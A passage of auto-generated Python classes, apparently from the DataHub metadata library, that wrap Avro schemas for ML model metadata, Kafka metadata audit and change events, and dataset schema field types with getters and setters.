"""Setter: Date when the MLModel was developed"""
self._inner_dict['date'] = value
@property
def version(self) -> Union[None, "VersionTagClass"]:
"""Getter: Version of the MLModel"""
return self._inner_dict.get('version') # type: ignore
@version.setter
def version(self, value: Union[None, "VersionTagClass"]) -> None:
"""Setter: Version of the MLModel"""
self._inner_dict['version'] = value
@property
def type(self) -> Union[None, str]:
"""Getter: Type of Algorithm or MLModel such as whether it is a Naive Bayes classifier, Convolutional Neural Network, etc"""
return self._inner_dict.get('type') # type: ignore
@type.setter
def type(self, value: Union[None, str]) -> None:
"""Setter: Type of Algorithm or MLModel such as whether it is a Naive Bayes classifier, Convolutional Neural Network, etc"""
self._inner_dict['type'] = value
@property
def hyperParameters(self) -> Union[None, Dict[str, Union[str, int, float, float, bool]]]:
"""Getter: Hyper Parameters of the MLModel"""
return self._inner_dict.get('hyperParameters') # type: ignore
@hyperParameters.setter
def hyperParameters(self, value: Union[None, Dict[str, Union[str, int, float, float, bool]]]) -> None:
"""Setter: Hyper Parameters of the MLModel"""
self._inner_dict['hyperParameters'] = value
@property
def mlFeatures(self) -> Union[None, List[str]]:
"""Getter: List of features used for MLModel training"""
return self._inner_dict.get('mlFeatures') # type: ignore
@mlFeatures.setter
def mlFeatures(self, value: Union[None, List[str]]) -> None:
"""Setter: List of features used for MLModel training"""
self._inner_dict['mlFeatures'] = value
@property
def tags(self) -> List[str]:
"""Getter: Tags for the MLModel"""
return self._inner_dict.get('tags') # type: ignore
@tags.setter
def tags(self, value: List[str]) -> None:
"""Setter: Tags for the MLModel"""
self._inner_dict['tags'] = value
@property
def trainingJobs(self) -> Union[None, List[str]]:
"""Getter: List of jobs (if any) used to train the model"""
return self._inner_dict.get('trainingJobs') # type: ignore
@trainingJobs.setter
def trainingJobs(self, value: Union[None, List[str]]) -> None:
"""Setter: List of jobs (if any) used to train the model"""
self._inner_dict['trainingJobs'] = value
@property
def downstreamJobs(self) -> Union[None, List[str]]:
"""Getter: List of jobs (if any) that use the model"""
return self._inner_dict.get('downstreamJobs') # type: ignore
@downstreamJobs.setter
def downstreamJobs(self, value: Union[None, List[str]]) -> None:
"""Setter: List of jobs (if any) that use the model"""
self._inner_dict['downstreamJobs'] = value
class MLPrimaryKeyPropertiesClass(DictWrapper):
"""Properties associated with a MLPrimaryKey"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.MLPrimaryKeyProperties")
def __init__(self,
sources: List[str],
description: Union[None, str]=None,
dataType: Union[None, Union[str, "MLFeatureDataTypeClass"]]=None,
version: Union[None, "VersionTagClass"]=None,
):
super().__init__()
self.description = description
self.dataType = dataType
self.version = version
self.sources = sources
@classmethod
def construct_with_defaults(cls) -> "MLPrimaryKeyPropertiesClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.description = self.RECORD_SCHEMA.field_map["description"].default
self.dataType = self.RECORD_SCHEMA.field_map["dataType"].default
self.version = self.RECORD_SCHEMA.field_map["version"].default
self.sources = list()
@property
def description(self) -> Union[None, str]:
"""Getter: Documentation of the MLPrimaryKey"""
return self._inner_dict.get('description') # type: ignore
@description.setter
def description(self, value: Union[None, str]) -> None:
"""Setter: Documentation of the MLPrimaryKey"""
self._inner_dict['description'] = value
@property
def dataType(self) -> Union[None, Union[str, "MLFeatureDataTypeClass"]]:
"""Getter: Data Type of the MLPrimaryKey"""
return self._inner_dict.get('dataType') # type: ignore
@dataType.setter
def dataType(self, value: Union[None, Union[str, "MLFeatureDataTypeClass"]]) -> None:
"""Setter: Data Type of the MLPrimaryKey"""
self._inner_dict['dataType'] = value
@property
def version(self) -> Union[None, "VersionTagClass"]:
"""Getter: Version of the MLPrimaryKey"""
return self._inner_dict.get('version') # type: ignore
@version.setter
def version(self, value: Union[None, "VersionTagClass"]) -> None:
"""Setter: Version of the MLPrimaryKey"""
self._inner_dict['version'] = value
@property
def sources(self) -> List[str]:
"""Getter: Source of the MLPrimaryKey"""
return self._inner_dict.get('sources') # type: ignore
@sources.setter
def sources(self, value: List[str]) -> None:
"""Setter: Source of the MLPrimaryKey"""
self._inner_dict['sources'] = value
class MetricsClass(DictWrapper):
"""Metrics to be featured for the MLModel."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.Metrics")
def __init__(self,
performanceMeasures: Union[None, List[str]]=None,
decisionThreshold: Union[None, List[str]]=None,
):
super().__init__()
self.performanceMeasures = performanceMeasures
self.decisionThreshold = decisionThreshold
@classmethod
def construct_with_defaults(cls) -> "MetricsClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.performanceMeasures = self.RECORD_SCHEMA.field_map["performanceMeasures"].default
self.decisionThreshold = self.RECORD_SCHEMA.field_map["decisionThreshold"].default
@property
def performanceMeasures(self) -> Union[None, List[str]]:
"""Getter: Measures of MLModel performance"""
return self._inner_dict.get('performanceMeasures') # type: ignore
@performanceMeasures.setter
def performanceMeasures(self, value: Union[None, List[str]]) -> None:
"""Setter: Measures of MLModel performance"""
self._inner_dict['performanceMeasures'] = value
@property
def decisionThreshold(self) -> Union[None, List[str]]:
"""Getter: Decision Thresholds used (if any)?"""
return self._inner_dict.get('decisionThreshold') # type: ignore
@decisionThreshold.setter
def decisionThreshold(self, value: Union[None, List[str]]) -> None:
"""Setter: Decision Thresholds used (if any)?"""
self._inner_dict['decisionThreshold'] = value
class QuantitativeAnalysesClass(DictWrapper):
"""Quantitative analyses should be disaggregated, that is, broken down by the chosen factors. Quantitative analyses should provide the results of evaluating the MLModel according to the chosen metrics, providing confidence interval values when possible."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.QuantitativeAnalyses")
def __init__(self,
unitaryResults: Union[None, str]=None,
intersectionalResults: Union[None, str]=None,
):
super().__init__()
self.unitaryResults = unitaryResults
self.intersectionalResults = intersectionalResults
@classmethod
def construct_with_defaults(cls) -> "QuantitativeAnalysesClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.unitaryResults = self.RECORD_SCHEMA.field_map["unitaryResults"].default
self.intersectionalResults = self.RECORD_SCHEMA.field_map["intersectionalResults"].default
@property
def unitaryResults(self) -> Union[None, str]:
"""Getter: Link to a dashboard with results showing how the MLModel performed with respect to each factor"""
return self._inner_dict.get('unitaryResults') # type: ignore
@unitaryResults.setter
def unitaryResults(self, value: Union[None, str]) -> None:
"""Setter: Link to a dashboard with results showing how the MLModel performed with respect to each factor"""
self._inner_dict['unitaryResults'] = value
@property
def intersectionalResults(self) -> Union[None, str]:
"""Getter: Link to a dashboard with results showing how the MLModel performed with respect to the intersection of evaluated factors?"""
return self._inner_dict.get('intersectionalResults') # type: ignore
@intersectionalResults.setter
def intersectionalResults(self, value: Union[None, str]) -> None:
"""Setter: Link to a dashboard with results showing how the MLModel performed with respect to the intersection of evaluated factors?"""
self._inner_dict['intersectionalResults'] = value
class SourceCodeClass(DictWrapper):
"""Source Code"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.SourceCode")
def __init__(self,
sourceCode: List["SourceCodeUrlClass"],
):
super().__init__()
self.sourceCode = sourceCode
@classmethod
def construct_with_defaults(cls) -> "SourceCodeClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.sourceCode = list()
@property
def sourceCode(self) -> List["SourceCodeUrlClass"]:
"""Getter: Source Code along with types"""
return self._inner_dict.get('sourceCode') # type: ignore
@sourceCode.setter
def sourceCode(self, value: List["SourceCodeUrlClass"]) -> None:
"""Setter: Source Code along with types"""
self._inner_dict['sourceCode'] = value
class SourceCodeUrlClass(DictWrapper):
"""Source Code Url Entity"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.SourceCodeUrl")
def __init__(self,
type: Union[str, "SourceCodeUrlTypeClass"],
sourceCodeUrl: str,
):
super().__init__()
self.type = type
self.sourceCodeUrl = sourceCodeUrl
@classmethod
def construct_with_defaults(cls) -> "SourceCodeUrlClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.type = SourceCodeUrlTypeClass.ML_MODEL_SOURCE_CODE
self.sourceCodeUrl = str()
@property
def type(self) -> Union[str, "SourceCodeUrlTypeClass"]:
"""Getter: Source Code Url Types"""
return self._inner_dict.get('type') # type: ignore
@type.setter
def type(self, value: Union[str, "SourceCodeUrlTypeClass"]) -> None:
"""Setter: Source Code Url Types"""
self._inner_dict['type'] = value
@property
def sourceCodeUrl(self) -> str:
"""Getter: Source Code Url"""
return self._inner_dict.get('sourceCodeUrl') # type: ignore
@sourceCodeUrl.setter
def sourceCodeUrl(self, value: str) -> None:
"""Setter: Source Code Url"""
self._inner_dict['sourceCodeUrl'] = value
class SourceCodeUrlTypeClass(object):
# No docs available.
ML_MODEL_SOURCE_CODE = "ML_MODEL_SOURCE_CODE"
TRAINING_PIPELINE_SOURCE_CODE = "TRAINING_PIPELINE_SOURCE_CODE"
EVALUATION_PIPELINE_SOURCE_CODE = "EVALUATION_PIPELINE_SOURCE_CODE"
class TrainingDataClass(DictWrapper):
"""Ideally, the MLModel card would contain as much information about the training data as the evaluation data. However, there might be cases where it is not feasible to provide this level of detailed information about the training data. For example, the data may be proprietary, or require a non-disclosure agreement. In these cases, we advocate for basic details about the distributions over groups in the data, as well as any other details that could inform stakeholders on the kinds of biases the model may have encoded."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.TrainingData")
def __init__(self,
trainingData: List["BaseDataClass"],
):
super().__init__()
self.trainingData = trainingData
@classmethod
def construct_with_defaults(cls) -> "TrainingDataClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.trainingData = list()
@property
def trainingData(self) -> List["BaseDataClass"]:
"""Getter: Details on the dataset(s) used for training the MLModel"""
return self._inner_dict.get('trainingData') # type: ignore
@trainingData.setter
def trainingData(self, value: List["BaseDataClass"]) -> None:
"""Setter: Details on the dataset(s) used for training the MLModel"""
self._inner_dict['trainingData'] = value
class MetadataAuditEventClass(DictWrapper):
"""Kafka event for capturing update made to an entity's metadata."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.mxe.MetadataAuditEvent")
def __init__(self,
newSnapshot: Union["ChartSnapshotClass", "CorpGroupSnapshotClass", "CorpUserSnapshotClass", "DashboardSnapshotClass", "DataFlowSnapshotClass", "DataJobSnapshotClass", "DatasetSnapshotClass", "DataProcessSnapshotClass", "DataPlatformSnapshotClass", "MLModelSnapshotClass", "MLPrimaryKeySnapshotClass", "MLFeatureSnapshotClass", "MLFeatureTableSnapshotClass", "TagSnapshotClass", "GlossaryTermSnapshotClass", "GlossaryNodeSnapshotClass"],
auditHeader: Union[None, "KafkaAuditHeaderClass"]=None,
oldSnapshot: Union[None, "ChartSnapshotClass", "CorpGroupSnapshotClass", "CorpUserSnapshotClass", "DashboardSnapshotClass", "DataFlowSnapshotClass", "DataJobSnapshotClass", "DatasetSnapshotClass", "DataProcessSnapshotClass", "DataPlatformSnapshotClass", "MLModelSnapshotClass", "MLPrimaryKeySnapshotClass", "MLFeatureSnapshotClass", "MLFeatureTableSnapshotClass", "TagSnapshotClass", "GlossaryTermSnapshotClass", "GlossaryNodeSnapshotClass"]=None,
):
super().__init__()
self.auditHeader = auditHeader
self.oldSnapshot = oldSnapshot
self.newSnapshot = newSnapshot
@classmethod
def construct_with_defaults(cls) -> "MetadataAuditEventClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.auditHeader = self.RECORD_SCHEMA.field_map["auditHeader"].default
self.oldSnapshot = self.RECORD_SCHEMA.field_map["oldSnapshot"].default
self.newSnapshot = ChartSnapshotClass.construct_with_defaults()
@property
def auditHeader(self) -> Union[None, "KafkaAuditHeaderClass"]:
"""Getter: Kafka audit header. See go/kafkaauditheader for more info."""
return self._inner_dict.get('auditHeader') # type: ignore
@auditHeader.setter
def auditHeader(self, value: Union[None, "KafkaAuditHeaderClass"]) -> None:
"""Setter: Kafka audit header. See go/kafkaauditheader for more info."""
self._inner_dict['auditHeader'] = value
@property
def oldSnapshot(self) -> Union[None, "ChartSnapshotClass", "CorpGroupSnapshotClass", "CorpUserSnapshotClass", "DashboardSnapshotClass", "DataFlowSnapshotClass", "DataJobSnapshotClass", "DatasetSnapshotClass", "DataProcessSnapshotClass", "DataPlatformSnapshotClass", "MLModelSnapshotClass", "MLPrimaryKeySnapshotClass", "MLFeatureSnapshotClass", "MLFeatureTableSnapshotClass", "TagSnapshotClass", "GlossaryTermSnapshotClass", "GlossaryNodeSnapshotClass"]:
"""Getter: Snapshot of the metadata before the update. Set to null for newly created metadata. Only the metadata aspects affected by the update are included in the snapshot."""
return self._inner_dict.get('oldSnapshot') # type: ignore
@oldSnapshot.setter
def oldSnapshot(self, value: Union[None, "ChartSnapshotClass", "CorpGroupSnapshotClass", "CorpUserSnapshotClass", "DashboardSnapshotClass", "DataFlowSnapshotClass", "DataJobSnapshotClass", "DatasetSnapshotClass", "DataProcessSnapshotClass", "DataPlatformSnapshotClass", "MLModelSnapshotClass", "MLPrimaryKeySnapshotClass", "MLFeatureSnapshotClass", "MLFeatureTableSnapshotClass", "TagSnapshotClass", "GlossaryTermSnapshotClass", "GlossaryNodeSnapshotClass"]) -> None:
"""Setter: Snapshot of the metadata before the update. Set to null for newly created metadata. Only the metadata aspects affected by the update are included in the snapshot."""
self._inner_dict['oldSnapshot'] = value
@property
def newSnapshot(self) -> Union["ChartSnapshotClass", "CorpGroupSnapshotClass", "CorpUserSnapshotClass", "DashboardSnapshotClass", "DataFlowSnapshotClass", "DataJobSnapshotClass", "DatasetSnapshotClass", "DataProcessSnapshotClass", "DataPlatformSnapshotClass", "MLModelSnapshotClass", "MLPrimaryKeySnapshotClass", "MLFeatureSnapshotClass", "MLFeatureTableSnapshotClass", "TagSnapshotClass", "GlossaryTermSnapshotClass", "GlossaryNodeSnapshotClass"]:
"""Getter: Snapshot of the metadata after the update. Only the metadata aspects affected by the update are included in the snapshot."""
return self._inner_dict.get('newSnapshot') # type: ignore
@newSnapshot.setter
def newSnapshot(self, value: Union["ChartSnapshotClass", "CorpGroupSnapshotClass", "CorpUserSnapshotClass", "DashboardSnapshotClass", "DataFlowSnapshotClass", "DataJobSnapshotClass", "DatasetSnapshotClass", "DataProcessSnapshotClass", "DataPlatformSnapshotClass", "MLModelSnapshotClass", "MLPrimaryKeySnapshotClass", "MLFeatureSnapshotClass", "MLFeatureTableSnapshotClass", "TagSnapshotClass", "GlossaryTermSnapshotClass", "GlossaryNodeSnapshotClass"]) -> None:
"""Setter: Snapshot of the metadata after the update. Only the metadata aspects affected by the update are included in the snapshot."""
self._inner_dict['newSnapshot'] = value
class MetadataChangeEventClass(DictWrapper):
"""Kafka event for proposing a metadata change for an entity. A corresponding MetadataAuditEvent is emitted when the change is accepted and committed, otherwise a FailedMetadataChangeEvent will be emitted instead."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.mxe.MetadataChangeEvent")
def __init__(self,
proposedSnapshot: Union["ChartSnapshotClass", "CorpGroupSnapshotClass", "CorpUserSnapshotClass", "DashboardSnapshotClass", "DataFlowSnapshotClass", "DataJobSnapshotClass", "DatasetSnapshotClass", "DataProcessSnapshotClass", "DataPlatformSnapshotClass", "MLModelSnapshotClass", "MLPrimaryKeySnapshotClass", "MLFeatureSnapshotClass", "MLFeatureTableSnapshotClass", "TagSnapshotClass", "GlossaryTermSnapshotClass", "GlossaryNodeSnapshotClass"],
auditHeader: Union[None, "KafkaAuditHeaderClass"]=None,
proposedDelta: None=None,
):
super().__init__()
self.auditHeader = auditHeader
self.proposedSnapshot = proposedSnapshot
self.proposedDelta = proposedDelta
@classmethod
def construct_with_defaults(cls) -> "MetadataChangeEventClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.auditHeader = self.RECORD_SCHEMA.field_map["auditHeader"].default
self.proposedSnapshot = ChartSnapshotClass.construct_with_defaults()
self.proposedDelta = self.RECORD_SCHEMA.field_map["proposedDelta"].default
@property
def auditHeader(self) -> Union[None, "KafkaAuditHeaderClass"]:
"""Getter: Kafka audit header. See go/kafkaauditheader for more info."""
return self._inner_dict.get('auditHeader') # type: ignore
@auditHeader.setter
def auditHeader(self, value: Union[None, "KafkaAuditHeaderClass"]) -> None:
"""Setter: Kafka audit header. See go/kafkaauditheader for more info."""
self._inner_dict['auditHeader'] = value
@property
def proposedSnapshot(self) -> Union["ChartSnapshotClass", "CorpGroupSnapshotClass", "CorpUserSnapshotClass", "DashboardSnapshotClass", "DataFlowSnapshotClass", "DataJobSnapshotClass", "DatasetSnapshotClass", "DataProcessSnapshotClass", "DataPlatformSnapshotClass", "MLModelSnapshotClass", "MLPrimaryKeySnapshotClass", "MLFeatureSnapshotClass", "MLFeatureTableSnapshotClass", "TagSnapshotClass", "GlossaryTermSnapshotClass", "GlossaryNodeSnapshotClass"]:
"""Getter: Snapshot of the proposed metadata change. Include only the aspects affected by the change in the snapshot."""
return self._inner_dict.get('proposedSnapshot') # type: ignore
@proposedSnapshot.setter
def proposedSnapshot(self, value: Union["ChartSnapshotClass", "CorpGroupSnapshotClass", "CorpUserSnapshotClass", "DashboardSnapshotClass", "DataFlowSnapshotClass", "DataJobSnapshotClass", "DatasetSnapshotClass", "DataProcessSnapshotClass", "DataPlatformSnapshotClass", "MLModelSnapshotClass", "MLPrimaryKeySnapshotClass", "MLFeatureSnapshotClass", "MLFeatureTableSnapshotClass", "TagSnapshotClass", "GlossaryTermSnapshotClass", "GlossaryNodeSnapshotClass"]) -> None:
"""Setter: Snapshot of the proposed metadata change. Include only the aspects affected by the change in the snapshot."""
self._inner_dict['proposedSnapshot'] = value
@property
def proposedDelta(self) -> None:
"""Getter: Delta of the proposed metadata partial update."""
return self._inner_dict.get('proposedDelta') # type: ignore
@proposedDelta.setter
def proposedDelta(self, value: None) -> None:
"""Setter: Delta of the proposed metadata partial update."""
self._inner_dict['proposedDelta'] = value
class ArrayTypeClass(DictWrapper):
"""Array field type."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.ArrayType")
def __init__(self,
nestedType: Union[None, List[str]]=None,
):
super().__init__()
self.nestedType = nestedType
@classmethod
def construct_with_defaults(cls) -> "ArrayTypeClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.nestedType = self.RECORD_SCHEMA.field_map["nestedType"].default
@property
def nestedType(self) -> Union[None, List[str]]:
"""Getter: List of types this array holds."""
return self._inner_dict.get('nestedType') # type: ignore
@nestedType.setter
def nestedType(self, value: Union[None, List[str]]) -> None:
"""Setter: List of types this array holds."""
self._inner_dict['nestedType'] = value
class BinaryJsonSchemaClass(DictWrapper):
"""Schema text of binary JSON schema."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.BinaryJsonSchema")
def __init__(self,
schema: str,
):
super().__init__()
self.schema = schema
@classmethod
def construct_with_defaults(cls) -> "BinaryJsonSchemaClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.schema = str()
@property
def schema(self) -> str:
"""Getter: The native schema text for binary JSON file format."""
return self._inner_dict.get('schema') # type: ignore
@schema.setter
def schema(self, value: str) -> None:
"""Setter: The native schema text for binary JSON file format."""
self._inner_dict['schema'] = value
class BooleanTypeClass(DictWrapper):
"""Boolean field type."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.BooleanType")
def __init__(self,
):
super().__init__()
@classmethod
def construct_with_defaults(cls) -> "BooleanTypeClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
pass
class BytesTypeClass(DictWrapper):
"""Bytes field type."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.BytesType")
def __init__(self,
):
super().__init__()
@classmethod
def construct_with_defaults(cls) -> "BytesTypeClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
pass
class DatasetFieldForeignKeyClass(DictWrapper):
"""For non-urn based foregin keys."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.DatasetFieldForeignKey")
def __init__(self,
parentDataset: str,
currentFieldPaths: List[str],
parentField: str,
):
super().__init__()
self.parentDataset = parentDataset
self.currentFieldPaths = currentFieldPaths
self.parentField = parentField
@classmethod
def construct_with_defaults(cls) -> "DatasetFieldForeignKeyClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.parentDataset = str()
self.currentFieldPaths = list()
self.parentField = str()
@property
def parentDataset(self) -> str:
"""Getter: dataset that stores the resource."""
return self._inner_dict.get('parentDataset') # type: ignore
@parentDataset.setter
def parentDataset(self, value: str) -> None:
"""Setter: dataset that stores the resource."""
self._inner_dict['parentDataset'] = value
@property
def currentFieldPaths(self) -> List[str]:
"""Getter: List of fields in hosting(current) SchemaMetadata that conform a foreign key. List can contain a single entry or multiple entries if several entries in hosting schema conform a foreign key in a single parent dataset."""
return self._inner_dict.get('currentFieldPaths') # type: ignore
@currentFieldPaths.setter
def currentFieldPaths(self, value: List[str]) -> None:
"""Setter: List of fields in hosting(current) SchemaMetadata that conform a foreign key. List can contain a single entry or multiple entries if several entries in hosting schema conform a foreign key in a single parent dataset."""
self._inner_dict['currentFieldPaths'] = value
@property
def parentField(self) -> str:
"""Getter: SchemaField@fieldPath that uniquely identify field in parent dataset that this field references."""
return self._inner_dict.get('parentField') # type: ignore
@parentField.setter
def parentField(self, value: str) -> None:
"""Setter: SchemaField@fieldPath that uniquely identify field in parent dataset that this field references."""
self._inner_dict['parentField'] = value
class DateTypeClass(DictWrapper):
"""Date field type."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.DateType")
def __init__(self,
):
super().__init__()
@classmethod
def construct_with_defaults(cls) -> "DateTypeClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
pass
class EditableSchemaFieldInfoClass(DictWrapper):
"""SchemaField to describe metadata related to dataset schema."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.EditableSchemaFieldInfo")
def __init__(self,
fieldPath: str,
description: Union[None, str]=None,
globalTags: Union[None, "GlobalTagsClass"]=None,
):
super().__init__()
self.fieldPath = fieldPath
self.description = description
self.globalTags = globalTags
@classmethod
def construct_with_defaults(cls) -> "EditableSchemaFieldInfoClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.fieldPath = str()
self.description = self.RECORD_SCHEMA.field_map["description"].default
self.globalTags = self.RECORD_SCHEMA.field_map["globalTags"].default
@property
def fieldPath(self) -> str:
"""Getter: FieldPath uniquely identifying the SchemaField this metadata is associated with"""
return self._inner_dict.get('fieldPath') # type: ignore
@fieldPath.setter
def fieldPath(self, value: str) -> None:
"""Setter: FieldPath uniquely identifying the SchemaField this metadata is associated with"""
self._inner_dict['fieldPath'] = value
@property
def description(self) -> Union[None, str]:
"""Getter: Description"""
return self._inner_dict.get('description') # type: ignore
@description.setter
def description(self, value: Union[None, str]) -> None:
"""Setter: Description"""
self._inner_dict['description'] = value
@property
def globalTags(self) -> Union[None, "GlobalTagsClass"]:
"""Getter: Tags associated with the field"""
return self._inner_dict.get('globalTags') # type: ignore
@globalTags.setter
def globalTags(self, value: Union[None, "GlobalTagsClass"]) -> None:
"""Setter: Tags associated with the field"""
self._inner_dict['globalTags'] = value
class EditableSchemaMetadataClass(DictWrapper):
"""EditableSchemaMetadata stores editable changes made to schema metadata. This separates changes made from
ingestion pipelines and edits in the UI to avoid accidental overwrites of user-provided data by ingestion pipelines."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.EditableSchemaMetadata")
def __init__(self,
editableSchemaFieldInfo: List["EditableSchemaFieldInfoClass"],
created: Optional["AuditStampClass"]=None,
lastModified: Optional["AuditStampClass"]=None,
deleted: Union[None, "AuditStampClass"]=None,
):
super().__init__()
if created is None:
# default: {'actor': 'urn:li:corpuser:unknown', 'impersonator': None, 'time': 0}
self.created = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["created"].default, writers_schema=self.RECORD_SCHEMA.field_map["created"].type)
else:
self.created = created
if lastModified is None:
# default: {'actor': 'urn:li:corpuser:unknown', 'impersonator': None, 'time': 0}
self.lastModified = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["lastModified"].default, writers_schema=self.RECORD_SCHEMA.field_map["lastModified"].type)
else:
self.lastModified = lastModified
self.deleted = deleted
self.editableSchemaFieldInfo = editableSchemaFieldInfo
@classmethod
def construct_with_defaults(cls) -> "EditableSchemaMetadataClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.created = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["created"].default, writers_schema=self.RECORD_SCHEMA.field_map["created"].type)
self.lastModified = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["lastModified"].default, writers_schema=self.RECORD_SCHEMA.field_map["lastModified"].type)
self.deleted = self.RECORD_SCHEMA.field_map["deleted"].default
self.editableSchemaFieldInfo = list()
@property
def created(self) -> "AuditStampClass":
"""Getter: An AuditStamp corresponding to the creation of this resource/association/sub-resource. A value of 0 for time indicates missing data."""
return self._inner_dict.get('created') # type: ignore
@created.setter
def created(self, value: "AuditStampClass") -> None:
"""Setter: An AuditStamp corresponding to the creation of this resource/association/sub-resource. A value of 0 for time indicates missing data."""
self._inner_dict['created'] = value
@property
def lastModified(self) -> "AuditStampClass":
"""Getter: An AuditStamp corresponding to the last modification of this resource/association/sub-resource. If no modification has happened since creation, lastModified should be the same as created. A value of 0 for time indicates missing data."""
return self._inner_dict.get('lastModified') # type: ignore
@lastModified.setter
def lastModified(self, value: "AuditStampClass") -> None:
"""Setter: An AuditStamp corresponding to the last modification of this resource/association/sub-resource. If no modification has happened since creation, lastModified should be the same as created. A value of 0 for time indicates missing data."""
self._inner_dict['lastModified'] = value
@property
def deleted(self) -> Union[None, "AuditStampClass"]:
"""Getter: An AuditStamp corresponding to the deletion of this resource/association/sub-resource. Logically, deleted MUST have a later timestamp than creation. It may or may not have the same time as lastModified depending upon the resource/association/sub-resource semantics."""
return self._inner_dict.get('deleted') # type: ignore
@deleted.setter
def deleted(self, value: Union[None, "AuditStampClass"]) -> None:
"""Setter: An AuditStamp corresponding to the deletion of this resource/association/sub-resource. Logically, deleted MUST have a later timestamp than creation. It may or may not have the same time as lastModified depending upon the resource/association/sub-resource semantics."""
self._inner_dict['deleted'] = value
@property
def editableSchemaFieldInfo(self) -> List["EditableSchemaFieldInfoClass"]:
"""Getter: Client provided a list of fields from document schema."""
return self._inner_dict.get('editableSchemaFieldInfo') # type: ignore
@editableSchemaFieldInfo.setter
def editableSchemaFieldInfo(self, value: List["EditableSchemaFieldInfoClass"]) -> None:
"""Setter: Client provided a list of fields from document schema."""
self._inner_dict['editableSchemaFieldInfo'] = value
class EnumTypeClass(DictWrapper):
"""Enum field type."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.EnumType")
def __init__(self,
):
super().__init__()
@classmethod
def construct_with_defaults(cls) -> "EnumTypeClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
pass
class EspressoSchemaClass(DictWrapper):
"""Schema text of an espresso table schema."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.EspressoSchema")
def __init__(self,
documentSchema: str,
tableSchema: str,
):
super().__init__()
self.documentSchema = documentSchema
self.tableSchema = tableSchema
@classmethod
def construct_with_defaults(cls) -> "EspressoSchemaClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.documentSchema = str()
self.tableSchema = str()
@property
def documentSchema(self) -> str:
"""Getter: The native espresso document schema."""
return self._inner_dict.get('documentSchema') # type: ignore
@documentSchema.setter
def documentSchema(self, value: str) -> None:
"""Setter: The native espresso document schema."""
self._inner_dict['documentSchema'] = value
@property
def tableSchema(self) -> str:
"""Getter: The espresso table schema definition."""
return self._inner_dict.get('tableSchema') # type: ignore
@tableSchema.setter
def tableSchema(self, value: str) -> None:
"""Setter: The espresso table schema definition."""
self._inner_dict['tableSchema'] = value
class FixedTypeClass(DictWrapper):
"""Fixed field type."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.FixedType")
def __init__(self,
):
super().__init__()
@classmethod
def construct_with_defaults(cls) -> "FixedTypeClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
pass
class ForeignKeySpecClass(DictWrapper):
"""Description of a foreign key in a schema."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.ForeignKeySpec")
def __init__(self,
foreignKey: Union["DatasetFieldForeignKeyClass", "UrnForeignKeyClass"],
):
super().__init__()
self.foreignKey = foreignKey
@classmethod
def construct_with_defaults(cls) -> "ForeignKeySpecClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.foreignKey = DatasetFieldForeignKeyClass.construct_with_defaults()
@property
def foreignKey(self) -> Union["DatasetFieldForeignKeyClass", "UrnForeignKeyClass"]:
"""Getter: Foreign key definition in metadata schema."""
return self._inner_dict.get('foreignKey') # type: ignore
@foreignKey.setter
def foreignKey(self, value: Union["DatasetFieldForeignKeyClass", "UrnForeignKeyClass"]) -> None:
"""Setter: Foreign key definition in metadata schema."""
self._inner_dict['foreignKey'] = value
class KafkaSchemaClass(DictWrapper):
"""Schema holder for kafka schema."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.KafkaSchema")
def __init__(self,
documentSchema: str,
):
super().__init__()
